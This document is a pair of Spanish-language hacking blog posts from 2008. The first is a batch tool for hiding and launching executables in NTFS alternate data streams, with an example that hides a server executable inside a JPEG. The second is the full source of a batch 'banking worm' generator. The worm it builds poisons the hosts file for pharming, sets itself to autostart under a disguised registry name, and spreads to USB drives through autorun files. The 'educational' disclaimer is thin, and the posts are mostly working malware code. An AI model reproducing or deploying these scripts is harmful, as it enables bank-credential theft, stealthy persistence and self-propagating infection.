HideBatch NTFS ADS Ocultacion Avanzada de Archivos

octalh — Sun, 10 Aug 2008 01:25:45 +0000

Todos los Windows NT nos ofrecen la posibilidad de instalar el S.O bajo un sistema de ficheros llamado NTFS, que supuestamente es más “seguro” que Fat32, porque nos da la oportunidad de crear políticas de acceso a nuestros ficheros, este sistema cuenta con una capacidad no documentada que nos permite usar los ADS (alternate dada stream), esta capacidad nos permite asociar información a un archivo o a un directorio, y existe para crear compatibilidad con el HFS (sistema de archivos de macintosh hierarchical file system), cuando asociamos archivo 1 a un archivo 2, permanece invariable, pero contiene el archivo 1 en esa seccion no documentada que en realidad esta apuntando a archivo2, lo que nos da la sensacion de “meter” todo un archivo dentro de otro.

¿Pero que beneficios nos trae?
Bueno entre varias cosas podemos ocultar un archivo de 100MB dentro de un txt de 1KB si así lo quisiéramos, o en dado caso podríamos incluso ocultar algún tipo de backdoor o malware dentro de un proceso critico del sistema.

Para seguir las practicas he realizado un pequeño batch script que nos automatiza el proceso de ocultación.

hidebatch.bat

@echo off
color C
cls
title HideBatch NTFS ADS by Octalh [ www.aztekmindz.org ]
if "%1" == "" goto portada
if "%1" == "-h" goto ocultar
if "%1" == "-u" goto mostrar
goto fin
:portada
echo.
echo www.aztekmindz.org :: octalh@gmail.com
echo _ _ _ _ _
echo ^| ^| ^(_^) ^| ^| ^| ^| _ ^| ^|
echo ^| ^|__ _ __^| ^|_____^| ^|__ _____ _^| ^|_ ____^| ^|__
echo ^| _ \^| ^|/ _ ^| ___ ^| _ \^(____ ^(_ _^) ___^) _ \
echo ^| ^| ^| ^| ^( ^(_^| ^| ____^| ^|_^) ^) ___ ^| ^| ^|^( ^(___^| ^| ^| ^|
echo ^|_^| ^|_^|_^|\____^|_____^)____/\_____^| \__^)____^)_^| ^|_^|
echo - Advanced Hide ^| Unhide NTFS File System -
echo - By Octalh -
echo.
echo USO: hidebatch [-h] / [-u] [Archivo 1] [Archivo 2]
echo.
echo { -h } Oculta un archivo dentro de otro
echo { -u } Ejecuta un archivo oculto
echo { Archivo 1 } Archivo a ocultar
echo { Archivo 2 } Archivo donde se ocultara Archivo 1
echo.
echo Ejemplo:
echo.
echo Ocultar archivo: hidebatch -h secreto.txt cancion.mp3
echo Ejecutar archivo oculto: hidebatch -u secreto.txt cancion.mp3
echo.
pause>nul
goto fin
:ocultar
type %2 >%3:%2
goto fin
:mostrar
Start .\%3:%2
goto fin
:fin

Suponiendo que queremos ocultar servidor.exe dentro de foto_xxx.jpg
Solo tenemos que ejecutar HideBatch de la siguiente manera:

hidebatch.bat -h servidor.exe foto_xxx.jpg

Ahora podemos proceder a eliminar servidor.exe pues ya se encuentra oculto en foto_xxx.jpg

del servidor.exe

Y ahora para ejecutar servidor.exe hacemos lo siguiente.

hidebatch.bat -u servidor.exe foto_xxx.jpg

Con esto damos por terminada esta breve explicación de los ADS y claro esperemos que ahora tengan mas conciencia sobre lo indefenso que puede estar un administrador promedio frente a este tipo de ataques.

Ya sabes como siempre cualquier duda un E-mail

Generador de Gusano bancario ( Pharming ) Batch

octalh — Sat, 28 Jun 2008 09:50:49 +0000

Código fuente de un generador de worm (gusano) programado en batch que envenena el archivo Host para realizar suplantaciones de IP ( Pharming ) además de contar con propagación de medios extraíbles ( Pendrives USB )

Código 100% Educativo para demostrar únicamente la facilidad en que un atacante puede afectarnos realizando este tipo de técnicas en nuestra contra.

@echo off
setlocal EnableDelayedExpansion
color A
cls
title b4nking-w0rm by Octalh [ www.aztekmindz.org ]
echo.
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo _ _ __ __ _ _
echo /\ ^| ^| ^| ^| ^| \/ ^(_^) ^| ^|
echo / \ ___^| ^|_ ___^| ^| __ ^| \ / ^|_ _ __ __^| ^|____
echo / /\ \ ^|_ / __/ _ \ ^|/ / ^| ^|\/^| ^| ^| ‘_ \ / _` ^|_ /
echo / ____ \ / /^| ^|^| __/ ^< ^| ^| ^| ^| ^| ^| ^| ^| (_^| ^|/ /
echo /_/ \_\/___^|\__\___^|_^|\_\ ^|_^| ^|_^|_^|_^| ^|_^|\__,_/___^|
echo.
echo www.aztekmindz.org octalh@gmail.com
echo.
echo - Generador de Gusano bancario ^( Pharming ^) Batch
echo - Testeado XP SP2
echo - Programado con fines educativos
echo - El autor no se hace responsable de
echo usos malintencionados.
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo.
echo.
set /P nombre= [1] Ingrese nombre del gusano:
::header
echo @echo off >%nombre%.bat
echo :: + [ b4nking-worm ] + >>%nombre%.bat
echo :: www.aztekmindz.org octalh@gmail.com >>%nombre%.bat
echo :: - Generador Gusano bancario - >>%nombre%.bat
::copiado
echo COPY %%0 "%WINDIR%\%nombre%.bat" >>%nombre%.bat
echo.
set /P ch= [2] Ingrese cantidad de hosts a ingresar:
echo.
echo [3] Ingrese la IP y el host separados por un espacio:
echo Ejemplo: 127.0.0.1 localhost
echo.

echo SET htxt=C:\WINDOWS\system32\drivers\etc\hosts >>%nombre%.bat
echo IF EXIST %%htxt%% ( >>%nombre%.bat
echo echo # [+]====[ b4nking w0rm by octalh ]====[+] ^>^>%%htxt%% >>%nombre%.bat

FOR /L %%i IN (1,1,%ch%) DO (
::Host
echo [ Almacenando Host %%i de %ch% ]
set /P hs= Host:
echo echo !hs! ^>^>%%htxt%% >>%nombre%.bat
)
echo echo # [+]====[ b4nking w0rm by octalh ]====[+] ^>^>%%htxt%% >>%nombre%.bat
echo ) >>%nombre%.bat
echo ipconfig /flushdns >>%nombre%.bat
echo.
set /p ai= [4] Activar Autoinicio? S/N:
if %ai%==s (
::Autoinicio
echo REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\%nombre%.bat" /f >> %nombre%.bat
)
echo.
set /p usb= [5] Activar Propagacion USB? S/N:
if %usb%==s (
::USB
echo :inicio >>%nombre%.bat
echo FOR %%%%A IN ^(D F G H I J K L M N O P Q R S T U V W X Y Z^) DO CALL :verificar %%%%A >>%nombre%.bat
echo GOTO :EOF >>%nombre%.bat
echo :verificar >>%nombre%.bat
echo IF EXIST "%%1:" ^(CALL :copiado %%1^) >>%nombre%.bat
echo GOTO :EOF >>%nombre%.bat
echo :copiado >>%nombre%.bat
echo COPY %nombre%.bat "%%1:\145782.bat" >>%nombre%.bat
echo echo [AUTORUN] ^> "%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\1=abrir ^>^>"%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\1\Command="%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\2=explorar ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shell\2\Command="%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo echo shellexecute= "\%nombre%.bat" ^>^>"%%1:\AUTORUN.INF" >>%nombre%.bat
echo ping -n 10 localhost >>%nombre%.bat
echo GOTO :inicio >>%nombre%.bat
)
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo [OK] Gusano editado con exito
echo.
echo Presione cualquier tecla para salir
echo.
echo +-+-+-+-+-+ +-+-+-+-+-+
echo ^|A^|z^|t^|e^|k^| ^|M^|i^|n^|d^|z^|
echo +-+-+-+-+-+ +-+-+-+-+-+
echo - www.aztekmindz.org ^| octalh@gmail.com -
echo.
echo [+]====================[ b4nking-worm ]====================[+]
echo.
echo.
pause>nul

Descargar Programa y herramientas utiles

Aztek Mindz » Script

HideBatch NTFS ADS Ocultacion Avanzada de Archivos

Generador de Gusano bancario ( Pharming ) Batch